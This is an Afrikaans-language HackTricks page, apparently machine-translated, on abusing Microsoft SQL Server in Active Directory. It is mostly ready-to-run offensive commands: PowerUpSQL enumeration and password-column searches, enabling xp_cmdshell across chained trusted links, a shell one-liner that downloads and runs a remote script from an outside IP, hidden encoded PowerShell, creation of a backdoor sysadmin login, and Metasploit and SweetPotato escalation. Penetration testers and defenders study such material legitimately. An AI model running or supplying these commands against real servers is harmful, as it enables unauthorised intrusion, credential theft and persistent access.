MSSQL AD Abuse

Leer AWS hak vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)!

MSSQL Opname / Ontdekking

Die powershell-module PowerUpSQL is baie nuttig in hierdie geval.

Import-Module .\PowerupSQL.psd1

Enumereer van die netwerk sonder domein-sessie

# Get local MSSQL instance (if any)
Get-SQLInstanceLocal
Get-SQLInstanceLocal | Get-SQLServerInfo

#If you don't have a AD account, you can try to find MSSQL scanning via UDP
#First, you will need a list of hosts to scan
Get-Content c:\temp\computers.txt | Get-SQLInstanceScanUDP –Verbose –Threads 10

#If you have some valid credentials and you have discovered valid MSSQL hosts you can try to login into them
#The discovered MSSQL servers must be on the file: C:\temp\instances.txt
Get-SQLInstanceFile -FilePath C:\temp\instances.txt | Get-SQLConnectionTest -Verbose -Username test -Password test

Enumerering van binne die domein

# Get local MSSQL instance (if any)
Get-SQLInstanceLocal
Get-SQLInstanceLocal | Get-SQLServerInfo

#Get info about valid MSQL instances running in domain
#This looks for SPNs that starts with MSSQL (not always is a MSSQL running instance)
Get-SQLInstanceDomain | Get-SQLServerinfo -Verbose

#Test connections with each one
Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -verbose

#Try to connect and obtain info from each MSSQL server (also useful to check conectivity)
Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose

# Get DBs, test connections and get info in oneliner
Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" } | Get-SQLServerInfo

MSSQL Basiese Misbruik

Toegang tot DB

#Perform a SQL query
Get-SQLQuery -Instance "sql.domain.io,1433" -Query "select @@servername"

#Dump an instance (a lotof CVSs generated in current dir)
Invoke-SQLDumpInfo -Verbose -Instance "dcorp-mssql"

# Search keywords in columns trying to access the MSSQL DBs
## This won't use trusted SQL links
Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" } | Get-SQLColumnSampleDataThreaded -Keywords "password" -SampleSize 5 | select instance, database, column, sample | ft -autosize

MSSQL RCE

Dit mag ook moontlik wees om bevele uit te voer binne die MSSQL-gashuis

Invoke-SQLOSCmd -Instance "srv.sub.domain.local,1433" -Command "whoami" -RawResults
# Invoke-SQLOSCmd automatically checks if xp_cmdshell is enable and enables it if necessary

MSSQL Basiese Hakkeltruuks

page1433 - Pentesting MSSQL - Microsoft SQL Server

MSSQL Vertroue Skakels

As 'n MSSQL-instantie vertrou word (databasiskakel) deur 'n ander MSSQL-instantie. As die gebruiker voorregte het oor die vertroue databasis, sal hy in staat wees om die vertrouensverhouding te gebruik om ook navrae in die ander instantie uit te voer. Hierdie vertrouensverhoudings kan geketting word en op 'n stadium mag die gebruiker 'n sleg gekonfigureerde databasis vind waar hy bevele kan uitvoer.

Die skakels tussen databasisse werk selfs oor bosvertrouens heen.

Powershell Misbruik

#Look for MSSQL links of an accessible instance
Get-SQLServerLink -Instance dcorp-mssql -Verbose #Check for DatabaseLinkd > 0

#Crawl trusted links, starting from the given one (the user being used by the MSSQL instance is also specified)
Get-SQLServerLinkCrawl -Instance mssql-srv.domain.local -Verbose

#If you are sysadmin in some trusted link you can enable xp_cmdshell with:
Get-SQLServerLinkCrawl -instance "<INSTANCE1>" -verbose -Query 'EXECUTE(''sp_configure ''''xp_cmdshell'''',1;reconfigure;'') AT "<INSTANCE2>"'

#Execute a query in all linked instances (try to execute commands), output should be in CustomQuery field
Get-SQLServerLinkCrawl -Instance mssql-srv.domain.local -Query "exec master..xp_cmdshell 'whoami'"

#Obtain a shell
Get-SQLServerLinkCrawl -Instance dcorp-mssql  -Query 'exec master..xp_cmdshell "powershell iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.114:8080/pc.ps1'')"'

#Check for possible vulnerabilities on an instance where you have access
Invoke-SQLAudit -Verbose -Instance "dcorp-mssql.dollarcorp.moneycorp.local"

#Try to escalate privileges on an instance
Invoke-SQLEscalatePriv –Verbose –Instance "SQLServer1\Instance1"

#Manual trusted link queery
Get-SQLQuery -Instance "sql.domain.io,1433" -Query "select * from openquery(""sql2.domain.io"", 'select * from information_schema.tables')"
## Enable xp_cmdshell and check it
Get-SQLQuery -Instance "sql.domain.io,1433" -Query 'SELECT * FROM OPENQUERY("sql2.domain.io", ''SELECT * FROM sys.configurations WHERE name = ''''xp_cmdshell'''''');'
Get-SQLQuery -Instance "sql.domain.io,1433" -Query 'EXEC(''sp_configure ''''show advanced options'''', 1; reconfigure;'') AT [sql.rto.external]'
Get-SQLQuery -Instance "sql.domain.io,1433" -Query 'EXEC(''sp_configure ''''xp_cmdshell'''', 1; reconfigure;'') AT [sql.rto.external]'
## If you see the results of @@selectname, it worked
Get-SQLQuery -Instance "sql.rto.local,1433" -Query 'SELECT * FROM OPENQUERY("sql.rto.external", ''select @@servername; exec xp_cmdshell ''''powershell whoami'''''');'

Metasploit

Jy kan maklik vir vertroude skakels kyk met Metasploit.

#Set username, password, windows auth (if using AD), IP...
msf> use exploit/windows/mssql/mssql_linkcrawler
[msf> set DEPLOY true] #Set DEPLOY to true if you want to abuse the privileges to obtain a meterpreter session

Notice dat metasploit sal probeer om slegs die openquery()-funksie in MSSQL te misbruik (so, as jy nie 'n bevel met openquery() kan uitvoer nie, sal jy die EXECUTE-metode handmatig moet probeer om bevele uit te voer, sien meer hieronder.)

Handmatig - Openquery()

Vanaf Linux kan jy 'n MSSQL-konsoleskild verkry met sqsh en mssqlclient.py.

Vanaf Windows kan jy ook die skakels vind en bevele handmatig uitvoer met 'n MSSQL-klient soos HeidiSQL

Aanmelding met Windows-outentifisering:

Betroubare Skakels vind

select * from master..sysservers;
EXEC sp_linkedservers;

Voer navrae uit in 'n betroubare skakel

Voer navrae uit deur die skakel (voorbeeld: vind meer skakels in die nuut toeganklike instansie):

select * from openquery("dcorp-sql1", 'select * from master..sysservers')

Kontroleer waar dubbelpunt en enkelkwotasies gebruik word, dit is belangrik om hulle op daardie manier te gebruik.

Jy kan hierdie vertroue skakelsketting vir ewig handmatig voortgesit.

# First level RCE
SELECT * FROM OPENQUERY("<computer>", 'select @@servername; exec xp_cmdshell ''powershell -w hidden -enc blah''')

# Second level RCE
SELECT * FROM OPENQUERY("<computer1>", 'select * from openquery("<computer2>", ''select @@servername; exec xp_cmdshell ''''powershell -enc blah'''''')')

Indien jy nie kan optree soos exec xp_cmdshell vanaf openquery() nie, probeer met die EXECUTE metode.

Handleiding - EXECUTE

Jy kan ook vertroue skakels misbruik deur EXECUTE te gebruik:

#Create user and give admin privileges
EXECUTE('EXECUTE(''CREATE LOGIN hacker WITH PASSWORD = ''''P@ssword123.'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2"
EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2"

Plaaslike Voorregskaping

Die MSSQL plaaslike gebruiker het gewoonlik 'n spesiale tipe voorreg genaamd SeImpersonatePrivilege. Dit laat die rekening toe om "‘n kliënt na outentifisering te impersoneer".

'n Strategie wat baie skrywers mee vore gekom het, is om 'n STELSELDIENS te dwing om by 'n bedrieglike of man-in-die-middel-diens te outentiseer wat die aanvaller skep. Hierdie bedrieglike diens kan dan die STELSELDIENS impersoneer terwyl dit probeer outentiseer.

SweetPotato het 'n versameling van hierdie verskeie tegnieke wat uitgevoer kan word via Beacon se execute-assembly bevel.

Leer AWS hak vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Last updated